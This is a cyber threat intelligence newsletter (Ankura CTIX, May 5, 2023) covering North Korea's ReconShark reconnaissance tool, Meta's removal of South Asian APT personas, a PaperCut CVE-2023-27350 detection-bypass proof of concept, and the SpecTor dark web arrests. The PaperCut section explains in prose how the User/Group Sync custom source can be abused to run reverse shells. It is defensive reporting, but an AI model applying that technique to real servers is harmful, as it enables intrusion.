United States: Ankura CTIX FLASH Update - May 5, 2023

Malware Activity

North Korean Threat Group Kimsuky Observed Using New "ReconShark" Tool in Latest Campaign

Researchers have discovered Kimsuky, a North Korean state-sponsored threat group also known as APT43, utilizing a new reconnaissance tool dubbed "ReconShark" during their latest campaign. This campaign has been targeting government organizations, research centers, think tanks, and universities in the United States, Asia, and Europe. ReconShark is noted to have expanded reconnaissance capabilities, including "unique execution instructions and server communication methods," and is delivered through spear-phishing emails to specifically targeted individuals. The emails involve malicious OneDrive links that lead victims into downloading password-protected malicious documents that have filenames relevant to the targeted user's subject matter. ReconShark is suspected to be the evolution of the malware "BabyShark" that the group utilized in its campaigns in 2018. ReconShark has the ability to exfiltrate valuable machine information, such as deployed detection mechanisms, running processes, battery information, and deployed endpoint threat detection measures. This ability is critical as researchers suspect that ReconShark is "part of a Kimsuky-orchestrated reconnaissance operation that enables subsequent precision attacks, possibly involving malware specifically tailored to evade defenses and exploit platform weaknesses." CTIX analysts will continue to monitor North Korean threat groups' activity and detail emerging malware as they are observed. Additional technical details as well as indicators of compromise (IOCs) can be viewed in the report linked below.

• The Hacker News: ReconShark Article
• SentinelOne: ReconShark Report

Threat Actor Activity

Meta Conducts Massive Campaign to Stop State-Sponsored Hackers from Conducting Counter-Espionage Operations

Three distinct threat actors used hundreds of fake personas on Facebook and Instagram to target individuals in South Asia during separate cyberattacks. These advanced persistent threat (APT) groups relied heavily on social engineering to deceive people into clicking malicious links or sharing personal information. The fake accounts impersonated recruiters, journalists, or military personnel and utilized traditional lures, such as romantic connections. Two (2) of the cyber espionage efforts employed low-sophistication malware to bypass app verification checks by Apple and Google. Meta, Facebook's parent company, identified and removed accounts linked to Pakistan and India-based APT groups that targeted military personnel and government employees in India and Pakistan. At least two (2) of these groups were identified as Patchwork APT and Bahamut APT, both of which operate in the South Asia sphere. 110 Facebook accounts were purged that had a connection to Bahamut, and fifty (50) accounts from Patchwork were also purged. Both groups used various malware apps uploaded to the Google Play Store disguised as VPN apps. Additionally, Meta has disrupted six adversarial networks from countries including the U.S., Venezuela, Iran, China, Georgia, Burkina Faso, and Togo, which engaged in "coordinated inauthentic behavior" on Facebook and other social media platforms. These geographically diverse networks set up fake news media brands, hacktivist groups, and NGOs to establish credibility. Some were linked to marketing firms and strategic communication departments in various countries. Two Chinese networks targeted users in India, Tibet, Taiwan, Japan, and the Uyghur community through fraudulent accounts on Facebook and Instagram. Meta successfully took down the threat actor accounts and pages before they could gain significant traction. To further add to the number of actors in this region, an Iranian network focused on Israel, Bahrain, and France was also discovered and had accounts purged as a result. Iranian state sponsored activity has been linked to twenty-four (24) such campaigns in 2022, up from seven (7) in 2021.

• The Hacker News: Meta Counter-Espionage Campaign Article
• Meta: Q1 2023 Security report

Vulnerabilities

Researchers Publish PoC for Bypassing Detection Measures for the Exploitation of the PaperCut Vulnerability

UPDATE: Researchers have published a new proof-of-concept (PoC) that completely bypasses detection measures for exploiting a known vulnerability affecting servers running the PaperCut print management solution. The flaw, tracked as CVE-2023-27350 (CVSS score: 9.8/10), is an improper access control vulnerability that allows remote attackers to bypass authentication and conduct remote code execution (RCE) to execute Windows PowerShell commands or drop malicious Java archive (JAR) files on servers running vulnerable instances of PaperCut NG and MF. This flaw is being actively exploited by multiple threat groups like Cl0p and LockBit to drop ransomware and other malware payloads. In the published PoC, the researchers explain that in previous attacks, whether the threat actors ran PowerShell or dropped JAR files, the activity left distinct digital footprints and logs on the victim machines. These indicators allow the system's security infrastructure to detect malicious behavior like authentication bypassing. In this PoC, the researchers abuse the "User/Group Sync" feature, which synchronizes the user and group information from sources like Active Directory (AD), making it possible to synchronize user and group information from AD, Lightweight Directory Access Protocol (LDAP), or a custom source. The researchers were able to bypass detection by exploiting the custom directory source feature, which allows the user to specify the authentication program they want to use, which could be any executable. In the PoC, the researchers were able to launch a Python reverse shell on Linux servers and download a custom reverse shell on Windows servers without activating any detection measures. A VulnCheck security researcher named Jacob Baines stated that an attacker with administrator permissions could exploit this flaw in multiple ways. Because of this, system mitigation measures should be robust. To prevent exploitation administrators should not exclusively focus on a single code execution method or set of methods to detect exploitation attempts. This is a dynamic matter that has been quickly changing, and CTIX analysts will continue to monitor the situation, providing relevant updates to our readers in the future.

• The Hacker News: PaperCut Vulnerability Article
• VulnCheck: PaperCut Detection Bypass PoC

Honorable Mention

International Law Enforcement Operation, SpecTor, Leads to the Arrest of 288 Dark Web Vendors

Efforts by U.S. and European governments to dismantle dark web vendors and their infrastructures continue. This time, the Federal Bureau of Investigation and Europol, along with police in the UK, France, Poland, Germany, Austria, Brazil, and Switzerland conducted an international law enforcement operation codenamed "SpecTor" leading to the arrest of 288 dark web vendors. Additionally, police seized $53.4M in cash and cryptocurrency as well as 1,874 pounds of narcotics and 117 firearms. Arrests stem from evidence gathered after the secret takedown of the Monopoly marketplace by German authorities in December of 2021, along with information obtained in additional recent dark web takedowns and the help of cryptocurrency tracing tools. Since then, Europol has been compiling intelligence packages from the evidence provided by German authorities to pinpoint major vendors and customers who were highly active on the Monopoly market and other illicit marketplaces. Using this data, they were able to put together a list of high-value targets who engaged in tens of thousands of sales of illicit goods across Europe, the United States, and Brazil who were arrested in the coordinated police effort in their respective countries. The most arrests were made in the U.S., totaling 153, followed by the UK with fifty-five (55), Germany with fifty-two (52), the Netherlands with ten (10), Austria with nine (9), France with five (5), Switzerland with two (2), Poland with one (1), and Brazil with one (1). CTIX analysts will continue to monitor further crack downs on criminal cryptocurrency transactions and the online criminal marketplaces that enable them.

• The Hacker News: SpecTor Article
• Bleeping Computer: SpecTor Article
• Wired: SpecTor Article

The semi-weekly Ankura Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence pertaining to current or emerging cyber events. The preceding is a collection of cyber threat intelligence leads assembled over the past few days and typically includes high level intelligence pertaining to recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to reach out to the Flash Team (flash@ankura.com) if additional context is needed.

The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.